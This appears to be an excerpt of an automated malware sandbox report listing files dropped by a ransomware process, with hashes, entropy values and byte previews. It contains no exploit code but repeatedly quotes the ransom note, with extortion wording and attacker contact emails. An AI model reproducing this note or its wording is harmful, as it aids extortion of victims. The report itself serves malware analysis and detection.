                                                                                                                                            Size (bytes):2337
                                                                                                                                            Entropy (8bit):7.919418700782641
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:ckLaJj/FP2C3wfNVNClAjWzmmSUcJG/EM315jmMsk8H:pLalhFwsaWz4Uc3KjK9
                                                                                                                                            MD5:30ECB05E872A7D8CEC46DE417EB595CF
                                                                                                                                            SHA1:D170298D98A0B2F0695B6898F56230F39BBDBB41
                                                                                                                                            SHA-256:093B16F665396122C662A2648EB94B8CCEA0520EA80EC5D69B2912F3E2FB2E80
                                                                                                                                            SHA-512:49A9E04A3BED573DADBB1C99F7AB4EAC22DCC1F402AFDB716090552D505E64849B7FDE9EDFE0F3D4E9B42006CFFB106C449DC75FE13368A2262C61E485D7AD02
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:mGK...D.....'..YeB...N..D.*`...8..g.k{..c).Xg.A.h$Wb}.Ge..4..t.%..&.5.2S.;.....n...I.Z...3].):.2...%B....l-....N.....7.......l...x...N...A....gs'.}W...d...O....Y...*.........t.L.U2R1.K.6vC..@,R.n..... @1..P]cv5%i....j../S.e4.iz@....T/.Z.2....x....8......l.*t{.%...J.$.\.=.gRA...:......0.A..N.e-q.yL....o...t.9......,...b.bz.Q..._..N......<.K.Y;.i....6-...\......EM.f.:o..........W.......;... .b.Ist....D..0....KB+]..D5.(...'.j.2.....K8.AC.t..]..t.\.].o..........|!`......}...A.....?.....na.$.....c..._..p.zZT5)$.P..O...C%z..F..k.T.l..-.......R`.{+... &.@......1...>O{..w.x4~#Q.N.DV..(..{...y).a..2._.k.....z.....GR.V..T.i.6....n.X...e..LoI....6....,u.o..u..g.~....l.4..-l....W...T.L...o..U...3i..v@s...{.\hu.|...t.......c...x....U.I..mC...-.H.2.<....j....h'.#..]v..<[.R..e.M......u..pd..........E.O.S..c...g 1.L...$.~..B..-).HzZw.s.}....v....l....4...nC~.\....".......|M]....m..;..lt....-_k.......}{S..;.^....Uw.^G..q<....h.@..=@Y).._.../n.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.868718136783928
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:16p/Y+6xQ6lgG2IheSQSxZeK5VPLazatvnjE7n5ijrbdeCg4Xmr9l:Mpg+6xJ+iwSfB3Jn47eb5Xc9l
                                                                                                                                            MD5:BC16890778B9B4230A077A4CEEC4DBEF
                                                                                                                                            SHA1:31F02C8E71AE729CD01AA81460AE53EA7751BF38
                                                                                                                                            SHA-256:8F42457893861A83DD72BA8AF191B303A70551A1C1EB08B21915C9B9C568CC0B
                                                                                                                                            SHA-512:017F09E1127915BC91E5F7DD9380E44674E10E1E38FA293239982A6AB67222866CD619AD4DB1292F0F8665076849C8BFC61EAE99B94B6716951C449FD91AAC7D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...!....%.|+...2.N>.z...U.).....u..+...Vi...9m2R1~n/.9..:.&..s..6....<....GS{>...H..j..t.m..M4kR.G....../.?..NI..Ft.....I.1..-.~....._o....5d.P...O|...K.........}.W7.z..^..J..Z.z9..,JM)-.........'k,!....V.;O`\.L'.G~........!.t..T....i~...3...w..U.i...!..4 ..#..4..1.60.B.;e$B..Iy.8,?&O.l.S.!.SO.......n.L>g..Q.0.8I\5..l....A.. .F^M_....z.F..X..'O.A.g.....N.....q[M....\t.%.xN.><..}.1.aM..59&.xa......D....F}CpH......}.....P.....!.C....V...;..3~5...K..X...5;r..h...).d].0..!k....jW..'..X...b..q.{-...8=m....&..?j._Rgr.4HD..Is... ;H._..4kgNw.\.u.W.....j.....k.0.N..O.\....)^{\R...d....,...9.e..Vp...o..LAL....9yt.........G.{|..~..E3..(;l.0.?&\.>..Q1+..l..,...-.....e.c...$..9\...@$...RGJ...u..}..-..c-.<.......bkm...P..........g.S.M.ta4.}=nE..Z....L.9Z.....[....8=...p...CKP.(..........h......|..W:5.geU.-.r\...v..T......(..H#.y...6..;....Oo_}.S......o....8 ...E...}.<.FS&...f..'.T..'....^mn.>...m*.%...D.W..D-.".........I.J.w...XF...d.R.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.868718136783928
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:16p/Y+6xQ6lgG2IheSQSxZeK5VPLazatvnjE7n5ijrbdeCg4Xmr9l:Mpg+6xJ+iwSfB3Jn47eb5Xc9l
                                                                                                                                            MD5:BC16890778B9B4230A077A4CEEC4DBEF
                                                                                                                                            SHA1:31F02C8E71AE729CD01AA81460AE53EA7751BF38
                                                                                                                                            SHA-256:8F42457893861A83DD72BA8AF191B303A70551A1C1EB08B21915C9B9C568CC0B
                                                                                                                                            SHA-512:017F09E1127915BC91E5F7DD9380E44674E10E1E38FA293239982A6AB67222866CD619AD4DB1292F0F8665076849C8BFC61EAE99B94B6716951C449FD91AAC7D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...!....%.|+...2.N>.z...U.).....u..+...Vi...9m2R1~n/.9..:.&..s..6....<....GS{>...H..j..t.m..M4kR.G....../.?..NI..Ft.....I.1..-.~....._o....5d.P...O|...K.........}.W7.z..^..J..Z.z9..,JM)-.........'k,!....V.;O`\.L'.G~........!.t..T....i~...3...w..U.i...!..4 ..#..4..1.60.B.;e$B..Iy.8,?&O.l.S.!.SO.......n.L>g..Q.0.8I\5..l....A.. .F^M_....z.F..X..'O.A.g.....N.....q[M....\t.%.xN.><..}.1.aM..59&.xa......D....F}CpH......}.....P.....!.C....V...;..3~5...K..X...5;r..h...).d].0..!k....jW..'..X...b..q.{-...8=m....&..?j._Rgr.4HD..Is... ;H._..4kgNw.\.u.W.....j.....k.0.N..O.\....)^{\R...d....,...9.e..Vp...o..LAL....9yt.........G.{|..~..E3..(;l.0.?&\.>..Q1+..l..,...-.....e.c...$..9\...@$...RGJ...u..}..-..c-.<.......bkm...P..........g.S.M.ta4.}=nE..Z....L.9Z.....[....8=...p...CKP.(..........h......|..W:5.geU.-.r\...v..T......(..H#.y...6..;....Oo_}.S......o....8 ...E...}.<.FS&...f..'.T..'....^mn.>...m*.%...D.W..D-.".........I.J.w...XF...d.R.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.849921871648343
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Hv0e/jcZkuNjgmPsUQpKDHnrLv+ACvY849YhxQBtvh/1nmPtipJQoRRLcx8H:sScZr8pKDHrCALIQBNnmPtGcOH
                                                                                                                                            MD5:C52C868ABE9B24AD4FB857D3257BC08A
                                                                                                                                            SHA1:C54BD6237AB2A1597ECD86309173BDBF34AB2C15
                                                                                                                                            SHA-256:4F6606A75BA8CBBCE2FDDBB8633E61257A3182617B53DDCB9F1D9541B90BC21D
                                                                                                                                            SHA-512:7BBA8FDF3BB75965D531ABCCBA8D997014DBC6433ECBB810134547BD7025CA63F6907A8710E1E44B721B583B747C7CF796D1D4909BB7400153F14C9A60FB49B2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:o.yt$Vj.r..t$.J._.n@....&\..#..6W.@-...2..Bm....*x.E.Y.......]_..........CS...rh.er..h.{.N.J.Bw.....G,...u....V..p.<b.X7.s.$0B9. iM8.-.t...Cp.).N..>L1...&O(N..(.>!H........#.D..C._.X.Xl.k../E...3.|..2.+.yD.Y..1.py...0.[....T..x....<........QK...8...P.;1.b.....p?-...R...~/....zI.eNp.e..+.%.U.:.x......7.3T.nc.oQ.U.(.....t..x..@]b.cw|.a..*lC...@.Z..b....B.g.......-.E...H0R/.q..}..,..oU\".|.....R..r".n.,;.l.1....m........248UG.S...[=...Wk1..J........... t.....'i)...A.._Ih...8....;....).9).V..X..B......2..u.9.#..g....N.6..T..HX....e. ..Om.?.9Q.#.N.]...I..IG..~N^.....&....&sn..$..8p+".g.X.k..+J.. .B.)....|yp?.H..]q..}A(.A.4>...H.+.R/xE...fD..x...o..0.44x....[.F.n.<...U.t....l;.[D];.G.9..j'......s..6A.G....._@.77.=.I_d.7`6.Z.....$Q.3.va..l......#.:.D....sh(^..N.......8.E.P. 7..k....u..{.t.....M.%.....A....$.y@.......x..x...U....y&.qs...{.!...4.v.!PKw....0"..QN:..VM.I......z*....M.#.1........./......u1KQaL..]'..l..........c.V....e.'.Nn.!8.".
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.849921871648343
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Hv0e/jcZkuNjgmPsUQpKDHnrLv+ACvY849YhxQBtvh/1nmPtipJQoRRLcx8H:sScZr8pKDHrCALIQBNnmPtGcOH
                                                                                                                                            MD5:C52C868ABE9B24AD4FB857D3257BC08A
                                                                                                                                            SHA1:C54BD6237AB2A1597ECD86309173BDBF34AB2C15
                                                                                                                                            SHA-256:4F6606A75BA8CBBCE2FDDBB8633E61257A3182617B53DDCB9F1D9541B90BC21D
                                                                                                                                            SHA-512:7BBA8FDF3BB75965D531ABCCBA8D997014DBC6433ECBB810134547BD7025CA63F6907A8710E1E44B721B583B747C7CF796D1D4909BB7400153F14C9A60FB49B2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:o.yt$Vj.r..t$.J._.n@....&\..#..6W.@-...2..Bm....*x.E.Y.......]_..........CS...rh.er..h.{.N.J.Bw.....G,...u....V..p.<b.X7.s.$0B9. iM8.-.t...Cp.).N..>L1...&O(N..(.>!H........#.D..C._.X.Xl.k../E...3.|..2.+.yD.Y..1.py...0.[....T..x....<........QK...8...P.;1.b.....p?-...R...~/....zI.eNp.e..+.%.U.:.x......7.3T.nc.oQ.U.(.....t..x..@]b.cw|.a..*lC...@.Z..b....B.g.......-.E...H0R/.q..}..,..oU\".|.....R..r".n.,;.l.1....m........248UG.S...[=...Wk1..J........... t.....'i)...A.._Ih...8....;....).9).V..X..B......2..u.9.#..g....N.6..T..HX....e. ..Om.?.9Q.#.N.]...I..IG..~N^.....&....&sn..$..8p+".g.X.k..+J.. .B.)....|yp?.H..]q..}A(.A.4>...H.+.R/xE...fD..x...o..0.44x....[.F.n.<...U.t....l;.[D];.G.9..j'......s..6A.G....._@.77.=.I_d.7`6.Z.....$Q.3.va..l......#.:.D....sh(^..N.......8.E.P. 7..k....u..{.t.....M.%.....A....$.y@.......x..x...U....y&.qs...{.!...4.v.!PKw....0"..QN:..VM.I......z*....M.#.1........./......u1KQaL..]'..l..........c.V....e.'.Nn.!8.".
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.854216784815395
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:/Uorgd4or+3EWgL/Mdjf/R8T2VJOtkrRxfX+m+mWaiHU/FlNzuZHA:/Uouz9Weijf/RC2VmGfX+mcaiHU/FlND
                                                                                                                                            MD5:78B466652EA7BB4B30830379C72AC479
                                                                                                                                            SHA1:E66D364E99D4B7B96DB40D17ACB28D1BFD493742
                                                                                                                                            SHA-256:048E5251CA5B6E847C54F3FFF40FFD9B54F34D0ED9CED9E0D473AB868761BB6B
                                                                                                                                            SHA-512:DCC683E5FFB2271293F360E86456F4E4DA0115AAB532E60411B7FCAD7A8C01703CB91D00657FF18A90AE986CA2CE666D446C3E745907D4AC59473C0EB57F6BED
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:p..%9..Qa.)(.y.?v....E)C-...LZM....$p&.y.5nn,r..7{..i..{.*.3.......s...p.K......#va4...@....H..f.T. .... ..x.2'.$....@`ZJR..qE.......%..-......r.WS..v...~2..-..'B....eJl_..mk>.....M.Nc.(c_?...p.\..%.kh.2u'}...:3*a].....,...T_.Vy>.^..Rz.....<..Aa.a.....4&.....p.,.t{:.J.).pb)..1#M.H.E..N#.*..a..r1.Bf^...e.]..M@.x...]@fpu.w........'.5Z5@..3#.....^.f.I.6...M/......J..."....^.......^.:.i.....?t5..[q............+...^..cPE/.-\h(84......,L0So..j|..k..#I./N..HE.....Zu.v...n.@....`.?..Z.%..../H..z+.......B.^..?rN........&.gy\.pX..&. ...!s.E.v=W....p.u....2....9.. ..3$P....`c8...I9..D...%..N..+.2.h..Rc..../?>.!....B.'.O..p7b...E".!\&).z`...O8...GI..N'..v..3X..Tp.7&....=."...._J.J..;W..Q&AQ..W.b...:N<y..} m........a.@..|4~&d.+....C....{."-.r+.>.........q2..1R...+P.?.]m.......LL .).W`.=Oyr.3.D..A.@I2...4r......Nq....:.p..]....F...e.......{R..S/..YYG/...t ..v.=.#.....O......R....i...b78B1...A].Z8.(..gT9./....++......E......`)..F8.M$...,..9^...(
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.854216784815395
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:/Uorgd4or+3EWgL/Mdjf/R8T2VJOtkrRxfX+m+mWaiHU/FlNzuZHA:/Uouz9Weijf/RC2VmGfX+mcaiHU/FlND
                                                                                                                                            MD5:78B466652EA7BB4B30830379C72AC479
                                                                                                                                            SHA1:E66D364E99D4B7B96DB40D17ACB28D1BFD493742
                                                                                                                                            SHA-256:048E5251CA5B6E847C54F3FFF40FFD9B54F34D0ED9CED9E0D473AB868761BB6B
                                                                                                                                            SHA-512:DCC683E5FFB2271293F360E86456F4E4DA0115AAB532E60411B7FCAD7A8C01703CB91D00657FF18A90AE986CA2CE666D446C3E745907D4AC59473C0EB57F6BED
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:p..%9..Qa.)(.y.?v....E)C-...LZM....$p&.y.5nn,r..7{..i..{.*.3.......s...p.K......#va4...@....H..f.T. .... ..x.2'.$....@`ZJR..qE.......%..-......r.WS..v...~2..-..'B....eJl_..mk>.....M.Nc.(c_?...p.\..%.kh.2u'}...:3*a].....,...T_.Vy>.^..Rz.....<..Aa.a.....4&.....p.,.t{:.J.).pb)..1#M.H.E..N#.*..a..r1.Bf^...e.]..M@.x...]@fpu.w........'.5Z5@..3#.....^.f.I.6...M/......J..."....^.......^.:.i.....?t5..[q............+...^..cPE/.-\h(84......,L0So..j|..k..#I./N..HE.....Zu.v...n.@....`.?..Z.%..../H..z+.......B.^..?rN........&.gy\.pX..&. ...!s.E.v=W....p.u....2....9.. ..3$P....`c8...I9..D...%..N..+.2.h..Rc..../?>.!....B.'.O..p7b...E".!\&).z`...O8...GI..N'..v..3X..Tp.7&....=."...._J.J..;W..Q&AQ..W.b...:N<y..} m........a.@..|4~&d.+....C....{."-.r+.>.........q2..1R...+P.?.]m.......LL .).W`.=Oyr.3.D..A.@I2...4r......Nq....:.p..]....F...e.......{R..S/..YYG/...t ..v.=.#.....O......R....i...b78B1...A].Z8.(..gT9./....++......E......`)..F8.M$...,..9^...(
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1802
                                                                                                                                            Entropy (8bit):7.893063197175479
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:sJViSnlXEJIBP6dwTpCU60onVs8otopZ9pP7J:MfnmJIBJpCEoV3o+v99J
                                                                                                                                            MD5:3156313004D43875E7D0B798FC32881B
                                                                                                                                            SHA1:9B6E68D33B79FAC83BDF2CE4D5AC1CA2955CAB3C
                                                                                                                                            SHA-256:BECF16F9FA95CE0C3AFDA643F7959504C4959E85F47A6B1C5A25D01CEF2A8C6E
                                                                                                                                            SHA-512:F28448B66016B633F5881048619093CB7E7B267530253E9839670229AA2A5E9BA51E11515ED056FCE0D90859877F2B7836D93BD5631573EEDBCBA08B442BBD6E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{....5ts8.0.a)...^...%...Y.......Zp.........x.2u..cY:.-.......si......O.k..:..O.;....F......@.n<....>..4.7.H0........Y...a.X.b..H.c....E&..d.'...+`....y..@.M.....m..2....vg...#.......{...z:..9.....=N..v..g...!.._...x.....i.....z.FE..tq...s.E..S.8...Wu1@J.6...,..t.e....3......q.^}.y.OB.O..b...!\g.....O..6..15=.V..T.z..9,.rQ..E.A...RK....~I...93..Yz.\........Oo[z".?...|....$..`..".p%..sa&..8.wJP.&.dV5Z&?...N....Z=..(D...#..{d.5&t.....k>.E..o...x.Xc..H....3.r1Y.........2.n..2.7.....M..X]..2...0.l..]!....:...M.Q.m..Q. .....&s...1>.._..m[....%t<8.W.f.+.7.....3G..{.}...E..-.-..R."...Ju.a.+..........[...X...8...h.Fc.*....u.5j.`..{.....0...$..m|3...T.t..4.fGr..uAq...~.M.U....".k.`z.c.EY.3.{.....X.q).|B....c.T.N..7.P..8..P.10...@.#oD.,B...J..`L0....G.(8...>X.8...#...GYP^..WG....e>^..n...s.4...4J.....qS.[0..m..4...q!....(._.#{. a..X.}.(M.[.Qw....u.......?...#....9.........e......*lJ...4B...y{..9W.M....e..2.i(}.........y.G"...K.|...X
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1802
                                                                                                                                            Entropy (8bit):7.893063197175479
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:sJViSnlXEJIBP6dwTpCU60onVs8otopZ9pP7J:MfnmJIBJpCEoV3o+v99J
                                                                                                                                            MD5:3156313004D43875E7D0B798FC32881B
                                                                                                                                            SHA1:9B6E68D33B79FAC83BDF2CE4D5AC1CA2955CAB3C
                                                                                                                                            SHA-256:BECF16F9FA95CE0C3AFDA643F7959504C4959E85F47A6B1C5A25D01CEF2A8C6E
                                                                                                                                            SHA-512:F28448B66016B633F5881048619093CB7E7B267530253E9839670229AA2A5E9BA51E11515ED056FCE0D90859877F2B7836D93BD5631573EEDBCBA08B442BBD6E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{....5ts8.0.a)...^...%...Y.......Zp.........x.2u..cY:.-.......si......O.k..:..O.;....F......@.n<....>..4.7.H0........Y...a.X.b..H.c....E&..d.'...+`....y..@.M.....m..2....vg...#.......{...z:..9.....=N..v..g...!.._...x.....i.....z.FE..tq...s.E..S.8...Wu1@J.6...,..t.e....3......q.^}.y.OB.O..b...!\g.....O..6..15=.V..T.z..9,.rQ..E.A...RK....~I...93..Yz.\........Oo[z".?...|....$..`..".p%..sa&..8.wJP.&.dV5Z&?...N....Z=..(D...#..{d.5&t.....k>.E..o...x.Xc..H....3.r1Y.........2.n..2.7.....M..X]..2...0.l..]!....:...M.Q.m..Q. .....&s...1>.._..m[....%t<8.W.f.+.7.....3G..{.}...E..-.-..R."...Ju.a.+..........[...X...8...h.Fc.*....u.5j.`..{.....0...$..m|3...T.t..4.fGr..uAq...~.M.U....".k.`z.c.EY.3.{.....X.q).|B....c.T.N..7.P..8..P.10...@.#oD.,B...J..`L0....G.(8...>X.8...#...GYP^..WG....e>^..n...s.4...4J.....qS.[0..m..4...q!....(._.#{. a..X.}.(M.[.Qw....u.......?...#....9.........e......*lJ...4B...y{..9W.M....e..2.i(}.........y.G"...K.|...X
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1802
                                                                                                                                            Entropy (8bit):7.893063197175479
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:sJViSnlXEJIBP6dwTpCU60onVs8otopZ9pP7J:MfnmJIBJpCEoV3o+v99J
                                                                                                                                            MD5:3156313004D43875E7D0B798FC32881B
                                                                                                                                            SHA1:9B6E68D33B79FAC83BDF2CE4D5AC1CA2955CAB3C
                                                                                                                                            SHA-256:BECF16F9FA95CE0C3AFDA643F7959504C4959E85F47A6B1C5A25D01CEF2A8C6E
                                                                                                                                            SHA-512:F28448B66016B633F5881048619093CB7E7B267530253E9839670229AA2A5E9BA51E11515ED056FCE0D90859877F2B7836D93BD5631573EEDBCBA08B442BBD6E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{....5ts8.0.a)...^...%...Y.......Zp.........x.2u..cY:.-.......si......O.k..:..O.;....F......@.n<....>..4.7.H0........Y...a.X.b..H.c....E&..d.'...+`....y..@.M.....m..2....vg...#.......{...z:..9.....=N..v..g...!.._...x.....i.....z.FE..tq...s.E..S.8...Wu1@J.6...,..t.e....3......q.^}.y.OB.O..b...!\g.....O..6..15=.V..T.z..9,.rQ..E.A...RK....~I...93..Yz.\........Oo[z".?...|....$..`..".p%..sa&..8.wJP.&.dV5Z&?...N....Z=..(D...#..{d.5&t.....k>.E..o...x.Xc..H....3.r1Y.........2.n..2.7.....M..X]..2...0.l..]!....:...M.Q.m..Q. .....&s...1>.._..m[....%t<8.W.f.+.7.....3G..{.}...E..-.-..R."...Ju.a.+..........[...X...8...h.Fc.*....u.5j.`..{.....0...$..m|3...T.t..4.fGr..uAq...~.M.U....".k.`z.c.EY.3.{.....X.q).|B....c.T.N..7.P..8..P.10...@.#oD.,B...J..`L0....G.(8...>X.8...#...GYP^..WG....e>^..n...s.4...4J.....qS.[0..m..4...q!....(._.#{. a..X.}.(M.[.Qw....u.......?...#....9.........e......*lJ...4B...y{..9W.M....e..2.i(}.........y.G"...K.|...X
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5898
                                                                                                                                            Entropy (8bit):7.442185798143654
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:w6ya4+j03/mcsfrL+PWmStPzIAOwEV9AjvKhPydRx+OcVDxY9:/hCBILmGbF4Ajvsyd3+OyxY9
